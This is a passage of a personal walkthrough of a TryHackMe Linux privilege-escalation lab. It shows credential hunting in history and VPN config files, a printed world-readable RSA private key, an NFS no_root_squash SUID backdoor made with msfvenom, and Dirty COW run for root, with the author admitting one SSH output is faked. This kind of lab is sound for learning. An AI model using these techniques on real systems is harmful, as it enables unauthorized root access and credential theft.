user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
Task 16 – Passwords & Keys – History Files
If a user accidently types their password on the command line instead of into a password prompt, it may get recorded in a "history file". Bash, for example, saves your command history in ~/.bash_history
.
- Let’s see if the owner of this box left behind any clues…:
user@debian:~$ cat ~/.*history
ls -al
cat .bash_history
ls -al
mysql -h somehost.local -uroot -ppassword123
exit
cd /tmp
clear
ifconfig
netstat -antp
nano myvpn.ovpn
- Looking at the above output, we can see they tried to access MySQL via command line, password and all! … worst still, they have reused that password on the actual root account!
user@debian:~$ su root
Password: password123
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
What is the full mysql command the user executed?
Task 17 – Passwords & Keys – Config Files
Config files can be a treasure-trove of information – even passwords!
- Note below, the user has a file named
myvpn.ovpn
– lets have a look:
user@debian:~$ ls
myvpn.ovpn tools
user@debian:~$ cat myvpn.ovpn
client
dev tun
proto udp
remote 10.10.10.10 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
tls-client
remote-cert-tls server
auth-user-pass /etc/openvpn/auth.txt
comp-lzo
verb 1
reneg-sec 0
- There is a line in this file starting with
auth-user-pass
that points to a text file…
user@debian:~$ cat /etc/openvpn/auth.txt
root
password123
Hello there!root login details! 😉
What file did you find the root user's credentials in?
Task 18 – Passwords & Keys – SSH Keys
Sometimes users make backups of important files, but fail to secure them with the correct permissions…
- Let’s check
/
for any hidden files or folders:
user@debian:~$ ls -la /
total 96
drwxr-xr-x 22 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
drwxr-xr-x 3 root root 4096 May 12 2017 boot
drwxr-xr-x 12 root root 2820 Nov 24 02:59 dev
drwxr-xr-x 67 root root 4096 Nov 24 05:20 etc
drwxr-xr-x 3 root root 4096 May 15 2017 home
lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14 2017 lib
lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
drwx------ 2 root root 16384 May 12 2017 lost+found
drwxr-xr-x 3 root root 4096 May 12 2017 media
drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
drwxr-xr-x 2 root root 4096 May 12 2017 opt
dr-xr-xr-x 96 root root 0 Nov 24 02:57 proc
drwx------ 5 root root 4096 May 15 2020 root
drwxr-xr-x 2 root root 4096 May 13 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
drwxr-xr-x 2 root root 4096 May 12 2017 srv
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
drwxr-xr-x 13 root root 0 Nov 24 02:57 sys
drwxrwxrwt 2 root root 4096 Nov 24 05:30 tmp
drwxr-xr-x 11 root root 4096 May 13 2017 usr
drwxr-xr-x 14 root root 4096 May 13 2017 var
lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
- Notice the
.ssh
folder? Let’s investigate that one further…
user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x 2 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 1679 Aug 25 2019 root_key
- A world-readable file named
root_key
– it’s a PRIVATE KEY:
user@debian:~$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo
OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD
eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET
Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2
NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ
YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+
5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el
WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7
VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7
6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW
1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K
824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6
Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc
U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1
Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi
SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV
d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im
jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa
871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok
X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4
CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----
- Lets dump this into a file locally, and see if it lets us connect!
❯ v root_key
❯ chmod 600 root_key
❯ ssh -i root_key root@10.10.200.127
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~#
NOTE: This didn’t actually work on my box when trying to connect to this box… I have also had issues with Host Key Algorithms and have to force SSH connections to this box with
-oHostKeyAlgorithms=+ssh-rsa
to connect… the above output is unfortunately faked. 🙁
Task 19 – NFS
Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
- Check the NFS share configuration on the target:
user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)
- Notice how the only enabled line has
no_root_squash
set as an option? This gives us a window to remotely create a backdoor (on attacking machine)! 😉
❯ sudo mkdir tmp
❯ sudo mount -o rw,vers=2 10.10.200.127:/tmp /home/stimpz/tryhackme/linux_privesc/tmp
❯ cd tmp
❯ ls
backup.tar.gz rootbash root.pm useless
❯ sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 132 bytes
Saved as: shell
❯ sudo chmod +xs shell
❯ ls -al
total 1028
drwxrwxrwt 2 root root 4096 Nov 24 22:15 .
drwxr-xr-x 1 stimpz stimpz 88 Nov 24 22:10 ..
-rw-r--r-- 1 root root 94900 Nov 24 22:15 backup.tar.gz
-rwsr-sr-x 1 root root 926536 Nov 24 22:15 rootbash
-rw-r--r-- 1 stimpz stimpz 60 Nov 24 20:04 root.pm
-rwsr-sr-x 1 root root 132 Nov 24 22:14 shell
-rw-r--r-- 1 root root 29 Nov 24 19:09 useless
- Now lets try running that file on the target:
user@debian:~$ /tmp/shell
bash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
What is the name of the option that disables root squashing?
Task 20 – Kernel Exploits
Kernel exploits can leave a system in an unstable state, which is why you should only run them as a last resort.
- Run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system:
user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.32
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[5] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[6] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[8] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[9] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[10] ptrace_kmod2
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[11] rawmodePTY
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[12] rds
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[13] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[14] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
One of the most popular kernel exploits, known as "Dirty C0W" is listed at number 3 – the source code for this exploit is available at /home/user/tools/kernel-exploits/dirtycow/
and it is named c0w.c
. This exploit uses the kernel exploit to overwrite the SUID binary /usr/bin/passwd
with one that spawns a root shell.
- Compile the code and run it (note that it might take several minutes to complete):
user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~$ ./c0w
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 74d5f000
madvise 0
ptrace 0
- Once compiled and exploited, simply run
/usr/bin/passwd
and it will drop you into a root shell:
user@debian:~$ /usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
Task 21 – Privilege Escalation Scripts
This task was purely running tools such as linPEAS, Linux Smart Enumeration and linEnum to see if the exploits above showed up… without attaching some SUPER LONG output from some of these above tools, let’s just say over all three they covered pretty much everything AND MORE. This is one of the core reasons that one of my personal first moves when getting onto a box is to run at least one of these and go from there. 😉
- linPEAS – The most popular and advanced Linux privilege escalation scanner on the market!
- Linux Smart Enumeration – A very thorough and detailed PrivEsc method scanner, can be controlled how much detail it outputs!
- linEnum – The original Linux PrivEsc checker, although now depreciated by the above two (and abandoned as of 2 years ago).